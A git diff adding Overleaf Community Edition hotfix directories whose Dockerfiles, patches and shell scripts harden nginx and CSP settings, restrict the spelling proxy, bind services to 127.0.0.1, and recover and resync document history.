fs.writeFile(file, content, err => { +- if (err) { +- logger.error({ err, projectId, file }, 'error writing log file') // don't fail on error +- } +- cb() ++ fs.unlink(file, () => { ++ fs.writeFile(file, content, { flag: 'wx' }, err => { ++ if (err) { ++ // don't fail on error ++ logger.error({ err, projectId, file }, 'error writing log file') ++ } ++ cb() ++ }) + }) + } else { + cb() diff --git a/server-ce/hotfix/4.2.7/pr_19297.patch b/server-ce/hotfix/4.2.7/pr_19297.patch new file mode 100644 index 0000000..2e46183 --- /dev/null +++ b/server-ce/hotfix/4.2.7/pr_19297.patch @@ -0,0 +1,70 @@ +--- a/services/web/app/src/Features/Spelling/SpellingController.js ++++ b/services/web/app/src/Features/Spelling/SpellingController.js +@@ -28,39 +28,35 @@ module.exports = { + }) + }, + +- proxyRequestToSpellingApi(req, res) { ++ proxyCheckRequestToSpellingApi(req, res) { + const { language } = req.body + +- let url = req.url.slice('/spelling'.length) +- +- if (url === '/check') { +- if (!language) { +- logger.error('"language" field should be included for spell checking') +- return res.status(422).json({ misspellings: [] }) +- } ++ if (!language) { ++ logger.error({}, '"language" field should be included for spell checking') ++ return res.status(422).json({ misspellings: [] }) ++ } + +- if (!languageCodeIsSupported(language)) { +- // this log statement can be changed to 'error' once projects with +- // unsupported languages are removed from the DB +- logger.debug({ language }, 'language not supported') +- return res.status(422).json({ misspellings: [] }) +- } ++ if (!languageCodeIsSupported(language)) { ++ // this log statement can be changed to 'error' once projects with ++ // unsupported languages are removed from the DB ++ logger.debug({ language }, 'language not supported') ++ return res.status(422).json({ misspellings: [] }) + } + + const userId = SessionManager.getLoggedInUserId(req.session) +- url = `/user/${userId}${url}` ++ const url = `${Settings.apis.spelling.url}/user/${userId}/check` + req.headers.Host = Settings.apis.spelling.host + return request({ +- url: Settings.apis.spelling.url + url, +- method: req.method, ++ url, ++ method: 'POST', + headers: req.headers, + json: req.body, + timeout: TEN_SECONDS, + }) + .on('error', function (error) { +- logger.error({ err: error }, 'Spelling API error') ++ logger.error({ err: error }, 'Spelling Check API error') + return res.status(500).end() + }) + .pipe(res) + }, +-} ++} +\ No newline at end of file + +--- a/services/web/app/src/router.js ++++ b/services/web/app/src/router.js +@@ -1083,7 +1083,7 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) { + webRouter.post( + '/spelling/check', + AuthenticationController.requireLogin(), +- SpellingController.proxyRequestToSpellingApi ++ SpellingController.proxyCheckRequestToSpellingApi + ) + webRouter.post( + '/spelling/learn', diff --git a/server-ce/hotfix/4.2.8/Dockerfile b/server-ce/hotfix/4.2.8/Dockerfile new file mode 100644 index 0000000..a2dbe4f --- /dev/null +++ b/server-ce/hotfix/4.2.8/Dockerfile @@ -0,0 +1,11 @@ +FROM sharelatex/sharelatex:4.2.7 + +# Fix crash on on invalid URLs +COPY pr_19612.patch . +RUN patch -p1 < pr_19612.patch && rm pr_19612.patch + +COPY pr_19550.patch . +RUN patch -p1 < pr_19550.patch && rm pr_19550.patch + +COPY is_19575.patch /etc/nginx/sites-enabled/ +RUN cd /etc/nginx/sites-enabled && patch -p0 < is_19575.patch && rm is_19575.patch diff --git a/server-ce/hotfix/4.2.8/is_19575.patch b/server-ce/hotfix/4.2.8/is_19575.patch new file mode 100644 index 0000000..5854d85 --- /dev/null +++ b/server-ce/hotfix/4.2.8/is_19575.patch @@ -0,0 +1,19 @@ +--- sharelatex.conf ++++ sharelatex.conf +@@ -67,6 +67,16 @@ server { + proxy_http_version 1.1; + } + ++ # block external access to metrics ++ location ~* ^/metrics/?$ { ++ return 404 'Not found'; ++ } ++ ++ # block external access to all health checks /health_check, /health_check/full, etc ++ location ~* ^/health_check { ++ return 404 'Not found'; ++ } ++ + # Load any extra configuration for this vhost + include /etc/nginx/vhost-extras/overleaf/*.conf; + } diff --git a/server-ce/hotfix/4.2.8/pr_19550.patch b/server-ce/hotfix/4.2.8/pr_19550.patch new file mode 100644 index 0000000..484a3f2 --- /dev/null +++ b/server-ce/hotfix/4.2.8/pr_19550.patch @@ -0,0 +1,58 @@ +diff --git a/services/web/app/src/infrastructure/CSP.js b/services/web/app/src/infrastructure/CSP.js +index 28f4f380d3d..abc11c59a48 100644 +--- a/services/web/app/src/infrastructure/CSP.js ++++ b/services/web/app/src/infrastructure/CSP.js +@@ -6,6 +6,7 @@ module.exports = function ({ + reportPercentage, + reportOnly = false, + exclude = [], ++ viewDirectives = {}, + }) { + const header = reportOnly + ? 'Content-Security-Policy-Report-Only' +@@ -33,7 +34,12 @@ module.exports = function ({ + + res.locals.scriptNonce = scriptNonce + +- const policy = buildViewPolicy(scriptNonce, reportPercentage, reportUri) ++ const policy = buildViewPolicy( ++ scriptNonce, ++ reportPercentage, ++ reportUri, ++ viewDirectives[view] ++ ) + + // Note: https://csp-evaluator.withgoogle.com/ is useful for checking the policy + +@@ -68,11 +74,17 @@ const buildDefaultPolicy = (reportUri, styleSrc) => { + return directives.join('; ') + } + +-const buildViewPolicy = (scriptNonce, reportPercentage, reportUri) => { ++const buildViewPolicy = ( ++ scriptNonce, ++ reportPercentage, ++ reportUri, ++ viewDirectives ++) => { + const directives = [ + `script-src 'nonce-${scriptNonce}' 'unsafe-inline' 'strict-dynamic' https: 'report-sample'`, // only allow scripts from certain sources + `object-src 'none'`, // forbid loading an "object" element + `base-uri 'none'`, // forbid setting a "base" element ++ ...(viewDirectives ?? []), + ] + + if (reportUri) { +--- a/services/web/config/settings.defaults.js ++++ b/services/web/config/settings.defaults.js +@@ -868,6 +868,9 @@ module.exports = { + reportPercentage: parseFloat(process.env.CSP_REPORT_PERCENTAGE) || 0, + reportUri: process.env.CSP_REPORT_URI, + exclude: ['app/views/project/editor'], ++ viewDirectives: { ++ 'app/views/project/ide-react': [`img-src 'self' data: blob:`], ++ }, + }, + + unsupportedBrowsers: { + diff --git a/server-ce/hotfix/4.2.8/pr_19612.patch b/server-ce/hotfix/4.2.8/pr_19612.patch new file mode 100644 index 0000000..3f46f92 --- /dev/null +++ b/server-ce/hotfix/4.2.8/pr_19612.patch @@ -0,0 +1,46 @@ +diff --git a/services/web/app/src/Features/HealthCheck/HealthCheckController.js b/services/web/app/src/Features/HealthCheck/HealthCheckController.js +index 278f04bb767..ff074cfa816 100644 +--- a/services/web/app/src/Features/HealthCheck/HealthCheckController.js ++++ b/services/web/app/src/Features/HealthCheck/HealthCheckController.js +@@ -45,6 +45,10 @@ module.exports = { + logger.err({ err }, 'failed api redis health check') + return res.sendStatus(500) + } ++ if (!settings.smokeTest.userId) { ++ logger.err({}, 'smokeTest.userId is undefined in health check') ++ return res.sendStatus(404) ++ } + UserGetter.getUserEmail(settings.smokeTest.userId, (err, email) => { + if (err) { + logger.err({ err }, 'failed api mongo health check') +diff --git a/services/web/app/src/infrastructure/ExpressLocals.js b/services/web/app/src/infrastructure/ExpressLocals.js +index 5f14977d3a3..2e9ed4f1ebb 100644 +--- a/services/web/app/src/infrastructure/ExpressLocals.js ++++ b/services/web/app/src/infrastructure/ExpressLocals.js +@@ -11,6 +11,7 @@ const Features = require('./Features') + const SessionManager = require('../Features/Authentication/SessionManager') + const PackageVersions = require('./PackageVersions') + const Modules = require('./Modules') ++const Errors = require('../Features/Errors/Errors') + const { + canRedirectToAdminDomain, + hasAdminAccess, +@@ -236,10 +237,14 @@ module.exports = function (webRouter, privateApiRouter, publicApiRouter) { + + // Don't include the query string parameters, otherwise Google + // treats ?nocdn=true as the canonical version +- const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) +- res.locals.currentUrl = parsedOriginalUrl.pathname +- res.locals.currentUrlWithQueryParams = +- parsedOriginalUrl.pathname + parsedOriginalUrl.search ++ try { ++ const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) ++ res.locals.currentUrl = parsedOriginalUrl.pathname ++ res.locals.currentUrlWithQueryParams = ++ parsedOriginalUrl.pathname + parsedOriginalUrl.search ++ } catch (err) { ++ return next(new Errors.InvalidError()) ++ } + res.locals.capitalize = function (string) { + if (string.length === 0) { + return '' diff --git a/server-ce/hotfix/4.2.9/Dockerfile b/server-ce/hotfix/4.2.9/Dockerfile new file mode 100644 index 0000000..43ca479 --- /dev/null +++ b/server-ce/hotfix/4.2.9/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:4.2.8 diff --git a/server-ce/hotfix/5.0.1/Dockerfile b/server-ce/hotfix/5.0.1/Dockerfile new file mode 100644 index 0000000..32ba317 --- /dev/null +++ b/server-ce/hotfix/5.0.1/Dockerfile @@ -0,0 +1,17 @@ +FROM sharelatex/sharelatex:5.0.0-RC4 + +# Bugfix: Grammarly ad shouldn't be displayed in Overleaf CE +COPY pr_17625.patch . +RUN patch -p0 < pr_17625.patch + +# Patch: force services to use ipv4 in server-ce container +ADD env.sh /etc/overleaf/env.sh +COPY pr_17601-1.patch /etc/overleaf/ +RUN cd /etc/overleaf && patch -p0 < pr_17601-1.patch && rm pr_17601-1.patch +COPY pr_17601-2.patch /overleaf/cron/ +RUN cd /overleaf/cron && patch -p0 < pr_17601-2.patch && rm pr_17601-2.patch +COPY pr_17601-3.patch /etc/nginx/sites-enabled/ +RUN cd /etc/nginx/sites-enabled && patch -p0 < pr_17601-3.patch && rm pr_17601-3.patch +COPY pr_17601-4.patch /etc/service/ +RUN cd /etc/service && patch -p0 < pr_17601-4.patch && rm pr_17601-4.patch + diff --git a/server-ce/hotfix/5.0.1/env.sh b/server-ce/hotfix/5.0.1/env.sh new file mode 100644 index 0000000..2dee36a --- /dev/null +++ b/server-ce/hotfix/5.0.1/env.sh @@ -0,0 +1,14 @@ +export CHAT_HOST=127.0.0.1 +export CLSI_HOST=127.0.0.1 +export CONTACTS_HOST=127.0.0.1 +export DOCSTORE_HOST=127.0.0.1 +export DOCUMENT_UPDATER_HOST=127.0.0.1 +export DOCUPDATER_HOST=127.0.0.1 +export FILESTORE_HOST=127.0.0.1 +export HISTORY_V1_HOST=127.0.0.1 +export NOTIFICATIONS_HOST=127.0.0.1 +export PROJECT_HISTORY_HOST=127.0.0.1 +export REALTIME_HOST=127.0.0.1 +export SPELLING_HOST=127.0.0.1 +export WEB_HOST=127.0.0.1 +export WEB_API_HOST=127.0.0.1 diff --git a/server-ce/hotfix/5.0.1/pr_17601-1.patch b/server-ce/hotfix/5.0.1/pr_17601-1.patch new file mode 100644 index 0000000..3f8c136 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-1.patch @@ -0,0 +1,31 @@ +--- settings.js ++++ settings.js +@@ -256,16 +256,16 @@ const settings = { + + apis: { + web: { +- url: 'http://localhost:3000', ++ url: 'http://127.0.0.1:3000', + user: httpAuthUser, + pass: httpAuthPass, + }, + project_history: { + sendProjectStructureOps: true, +- url: 'http://localhost:3054', ++ url: 'http://127.0.0.1:3054', + }, + v1_history: { +- url: process.env.V1_HISTORY_URL || 'http://localhost:3100/api', ++ url: process.env.V1_HISTORY_URL || 'http://127.0.0.1:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, + requestTimeout: parseInt( +@@ -409,7 +409,7 @@ if ( + + if (parse(process.env.OVERLEAF_IS_SERVER_PRO) === true) { + settings.bypassPercentageRollouts = true +- settings.apis.references = { url: 'http://localhost:3040' } ++ settings.apis.references = { url: 'http://127.0.0.1:3040' } + } + + // Compiler diff --git a/server-ce/hotfix/5.0.1/pr_17601-2.patch b/server-ce/hotfix/5.0.1/pr_17601-2.patch new file mode 100644 index 0000000..2322ad9 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-2.patch @@ -0,0 +1,63 @@ +--- deactivate-projects.sh ++++ deactivate-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-projects.sh ++++ delete-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-users.sh ++++ delete-users.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- project-history-periodic-flush.sh ++++ project-history-periodic-flush.sh +@@ -7,6 +7,6 @@ echo "Flush project-history queue" + echo "--------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/flush/old?timeout=3600000&limit=5000&background=1" +--- project-history-retry-hard.sh ++++ project-history-retry-hard.sh +@@ -7,6 +7,6 @@ echo "Retry project-history errors (hard)" + echo "-----------------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" +--- project-history-retry-soft.sh ++++ project-history-retry-soft.sh +@@ -6,6 +6,6 @@ echo "-----------------------------------" + echo "Retry project-history errors (soft)" + echo "-----------------------------------" + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/5.0.1/pr_17601-3.patch b/server-ce/hotfix/5.0.1/pr_17601-3.patch new file mode 100644 index 0000000..fa138d6 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-3.patch @@ -0,0 +1,46 @@ +--- overleaf.conf ++++ overleaf.conf +@@ -10,7 +10,7 @@ server { + } + + location / { +- proxy_pass http://localhost:4000; ++ proxy_pass http://127.0.0.1:4000; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; +@@ -22,7 +22,7 @@ server { + } + + location /socket.io { +- proxy_pass http://localhost:3026; ++ proxy_pass http://127.0.0.1:3026; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; +@@ -48,22 +48,22 @@ server { + + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } diff --git a/server-ce/hotfix/5.0.1/pr_17601-4.patch b/server-ce/hotfix/5.0.1/pr_17601-4.patch new file mode 100644 index 0000000..9b1fed6 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-4.patch @@ -0,0 +1,118 @@ +--- chat-overleaf/run ++++ chat-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30100" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/chat/app.js >> /var/log/overleaf/chat.log 2>&1 +--- clsi-overleaf/run ++++ clsi-overleaf/run +@@ -15,4 +15,7 @@ if [ -e '/var/run/docker.sock' ]; then + usermod -aG dockeronhost www-data + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/clsi/app.js >> /var/log/overleaf/clsi.log 2>&1 +--- contacts-overleaf/run ++++ contacts-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30360" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/contacts/app.js >> /var/log/overleaf/contacts.log 2>&1 +--- docstore-overleaf/run ++++ docstore-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30160" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/docstore/app.js >> /var/log/overleaf/docstore.log 2>&1 +--- document-updater-overleaf/run ++++ document-updater-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30030" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/document-updater/app.js >> /var/log/overleaf/document-updater.log 2>&1 +--- filestore-overleaf/run ++++ filestore-overleaf/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/filestore/app.js >> /var/log/overleaf/filestore.log 2>&1 +--- notifications-overleaf/run ++++ notifications-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30420" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/notifications/app.js >> /var/log/overleaf/notifications.log 2>&1 +--- project-history-overleaf/run ++++ project-history-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30540" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/project-history/app.js >> /var/log/overleaf/project-history.log 2>&1 +--- real-time-overleaf/run ++++ real-time-overleaf/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/real-time/app.js >> /var/log/overleaf/real-time.log 2>&1 +--- spelling-overleaf/run ++++ spelling-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30050" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/spelling/app.js >> /var/log/overleaf/spelling.log 2>&1 +--- web-api-overleaf/run ++++ web-api-overleaf/run +@@ -6,6 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30000" + fi + ++source /etc/overleaf/env.sh + export LISTEN_ADDRESS=0.0.0.0 + export ENABLED_SERVICES="api" + export METRICS_APP_NAME="web-api" +--- web-overleaf/run ++++ web-overleaf/run +@@ -6,6 +6,8 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:40000" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 + export ENABLED_SERVICES="web" + export WEB_PORT="4000" diff --git a/server-ce/hotfix/5.0.1/pr_17625.patch b/server-ce/hotfix/5.0.1/pr_17625.patch new file mode 100644 index 0000000..0241c11 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17625.patch @@ -0,0 +1,23 @@ +--- services/web/frontend/js/features/source-editor/components/grammarly-advert.tsx ++++ services/web/frontend/js/features/source-editor/components/grammarly-advert.tsx +@@ -6,8 +6,12 @@ import useRemindMeLater from '@/shared/hooks/use-remind-me-later' + import GrammarlyLogo from '@/shared/svgs/grammarly-logo' + import * as eventTracking from '../../../infrastructure/event-tracking' + import useWaitForGrammarlyCheck from '@/shared/hooks/use-wait-for-grammarly-check' ++import getMeta from '@/utils/meta' ++import { ExposedSettings } from '../../../../../types/exposed-settings' + + export default function GrammarlyAdvert() { ++ const { isOverleaf } = getMeta('ol-ExposedSettings') as ExposedSettings ++ + const [show, setShow] = useState(false) + const { t } = useTranslation() + +@@ -57,7 +61,7 @@ export default function GrammarlyAdvert() { + remindThemLater() + }, [remindThemLater]) + +- if (!show) { ++ if (!isOverleaf || !show) { + return null + } diff --git a/server-ce/hotfix/5.0.2/910_initiate_doc_version_recovery b/server-ce/hotfix/5.0.2/910_initiate_doc_version_recovery new file mode 100755 index 0000000..cda3d67 --- /dev/null +++ b/server-ce/hotfix/5.0.2/910_initiate_doc_version_recovery @@ -0,0 +1,50 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh + +LOG_FILE=/var/lib/overleaf/data/history/doc-version-recovery.log +export DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE=/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log + +echo "Checking for doc version recovery. This can take a while if needed. Logs are in $LOG_FILE" +cd /overleaf/services/history-v1 +LOG_LEVEL=info node storage/scripts/recover_doc_versions.js 2>&1 | tee -a "$LOG_FILE" + +function resyncAllProjectsInBackground() { + waitForService docstore 3016 + waitForService document-updater 3003 + waitForService filestore 3009 + waitForService history-v1 3100 + waitForService project-history 3054 + waitForService web-api 4000 + + # Resync files that had their versions updated + while read -r project_id; do + echo "Resyncing project $project_id..." + curl -X POST --silent "http://127.0.0.1:3054/project/$project_id/resync?force=true" + done < "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE" + + # Resync files that have broken histories + /overleaf/bin/force-history-resyncs + + echo "Finished resyncing history for all projects. Adding .done suffix to log file" + mv "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE" "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE.done" +} + +function waitForService() { + local name=$1 + local port=$2 + while ! curl --fail --silent "http://127.0.0.1:$port/status"; do + echo "Waiting for $name service to start up" + sleep 10 + done +} + +if [ -f "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE" ]; then + echo "Finished recovery of doc versions. Resyncing history for all projects in the background." + resyncAllProjectsInBackground & +else + echo "No recovery of doc versions needed." +fi diff --git a/server-ce/hotfix/5.0.2/Dockerfile b/server-ce/hotfix/5.0.2/Dockerfile new file mode 100644 index 0000000..e5bad9f --- /dev/null +++ b/server-ce/hotfix/5.0.2/Dockerfile @@ -0,0 +1,35 @@ +FROM sharelatex/sharelatex:5.0.1 + +# Upgrade Node.js to version 18.20.2 +RUN apt-get update \ +&& apt-get install -y nodejs=18.20.2-1nodesource1 \ +&& rm -rf /var/lib/apt/lists/* + +# Patch: https://github.com/overleaf/internal/pull/17843 +COPY pr_17843.patch . +RUN patch -p0 < pr_17843.patch \ +&& rm pr_17843.patch + +# Add history utility scripts +ADD bin/* /overleaf/bin/ + +# Patch: https://github.com/overleaf/internal/pull/17885 +COPY pr_17885.patch . +RUN patch -p0 -d /etc/my_init.pre_shutdown.d < pr_17885.patch \ +&& rm pr_17885.patch + +# Recompile frontend for Grammarly patch in 5.0.1 +RUN node genScript compile | bash + +# Patch: https://github.com/overleaf/internal/pull/17960 +COPY pr_17960.patch . +RUN patch -p0 < pr_17960.patch \ +&& rm pr_17960.patch + +# Fix bad ordering of migrations +RUN mv /overleaf/services/web/migrations/20231219081700_move_doc_versions_from_docops_to_docs.js \ + /overleaf/services/web/migrations/20231105000000_move_doc_versions_from_docops_to_docs.js + +# Add doc versions recovery scripts +ADD 910_initiate_doc_version_recovery /etc/my_init.d/910_initiate_doc_version_recovery +ADD recover_doc_versions.js /overleaf/services/history-v1/storage/scripts/recover_doc_versions.js diff --git a/server-ce/hotfix/5.0.2/bin/flush-history-queues b/server-ce/hotfix/5.0.2/bin/flush-history-queues new file mode 100755 index 0000000..b54bc55 --- /dev/null +++ b/server-ce/hotfix/5.0.2/bin/flush-history-queues @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/flush_all.js 100000 diff --git a/server-ce/hotfix/5.0.2/bin/force-history-resyncs b/server-ce/hotfix/5.0.2/bin/force-history-resyncs new file mode 100755 index 0000000..389c98a --- /dev/null +++ b/server-ce/hotfix/5.0.2/bin/force-history-resyncs @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/force_resync.js 1000 force diff --git a/server-ce/hotfix/5.0.2/pr_17843.patch b/server-ce/hotfix/5.0.2/pr_17843.patch new file mode 100644 index 0000000..6865b9b --- /dev/null +++ b/server-ce/hotfix/5.0.2/pr_17843.patch @@ -0,0 +1,48 @@ +--- services/project-history/app/js/ErrorRecorder.js ++++ services/project-history/app/js/ErrorRecorder.js +@@ -210,6 +210,14 @@ export function getFailures(callback) { + 'Error: bad response from filestore: 404': 'filestore-404', + 'Error: bad response from filestore: 500': 'filestore-500', + 'NotFoundError: got a 404 from web api': 'web-api-404', ++ 'OError: history store a non-success status code: 413': ++ 'history-store-413', ++ 'OError: history store a non-success status code: 422': ++ 'history-store-422', ++ 'OError: history store a non-success status code: 500': ++ 'history-store-500', ++ 'OError: history store a non-success status code: 503': ++ 'history-store-503', + 'Error: history store a non-success status code: 413': + 'history-store-413', + 'Error: history store a non-success status code: 422': +--- services/project-history/app/js/RetryManager.js ++++ services/project-history/app/js/RetryManager.js +@@ -20,6 +20,7 @@ const TEMPORARY_FAILURES = [ + + const HARD_FAILURES = [ + 'Error: history store a non-success status code: 422', ++ 'OError: history store a non-success status code: 422', + 'OpsOutOfOrderError: project structure version out of order', + 'OpsOutOfOrderError: project structure version out of order on incoming updates', + 'OpsOutOfOrderError: doc version out of order', +--- services/project-history/scripts/clear_deleted_history.js ++++ services/project-history/scripts/clear_deleted_history.js +@@ -143,7 +143,7 @@ function checkAndClear(project, callback) { + // find all the broken projects from the failure records + async function main() { + const results = await db.projectHistoryFailures +- .find({ error: 'Error: history store a non-success status code: 422' }) ++ .find({ error: /history store a non-success status code: 422/ }) + .toArray() + + console.log('number of queues without history store 442 =', results.length) +--- services/project-history/scripts/force_resync.js ++++ services/project-history/scripts/force_resync.js +@@ -198,6 +198,7 @@ function checkAndClear(project, callback) { + // find all the broken projects from the failure records + const errorsToResync = [ + 'Error: history store a non-success status code: 422', ++ 'OError: history store a non-success status code: 422', + 'OpsOutOfOrderError: project structure version out of order', + ] + diff --git a/server-ce/hotfix/5.0.2/pr_17885.patch b/server-ce/hotfix/5.0.2/pr_17885.patch new file mode 100644 index 0000000..0e7d326 --- /dev/null +++ b/server-ce/hotfix/5.0.2/pr_17885.patch @@ -0,0 +1,33 @@ +--- 00_close_site ++++ 00_close_site +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/overleaf/env.sh ++ + SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown" + + mv "${SITE_MAINTENANCE_FILE}" "${SITE_MAINTENANCE_FILE_BAK}" +--- 01_flush_document_updater ++++ 01_flush_document_updater +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/overleaf/env.sh ++ + cd /overleaf/services/document-updater && node scripts/flush_all.js >> /var/log/overleaf/document-updater.log 2>&1 + + EXIT_CODE="$?" +--- 02_flush_project_history ++++ 02_flush_project_history +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/overleaf/env.sh ++ + cd /overleaf/services/project-history && node scripts/flush_all.js >> /var/log/overleaf/project-history.log 2>&1 + + EXIT_CODE="$?" diff --git a/server-ce/hotfix/5.0.2/pr_17960.patch b/server-ce/hotfix/5.0.2/pr_17960.patch new file mode 100644 index 0000000..9a04321 --- /dev/null +++ b/server-ce/hotfix/5.0.2/pr_17960.patch @@ -0,0 +1,32 @@ +diff --git a/services/project-history/scripts/force_resync.js b/services/project-history/scripts/force_resync.js +index 5e77b35826..13e7d3cd5c 100755 +--- services/project-history/scripts/force_resync.js ++++ services/project-history/scripts/force_resync.js +@@ -77,7 +77,7 @@ function checkAndClear(project, callback) { + function startResync(cb) { + if (force) { + console.log('2. starting resync for', projectId) +- SyncManager.startResync(projectId, err => { ++ SyncManager.startHardResync(projectId, err => { + if (err) { 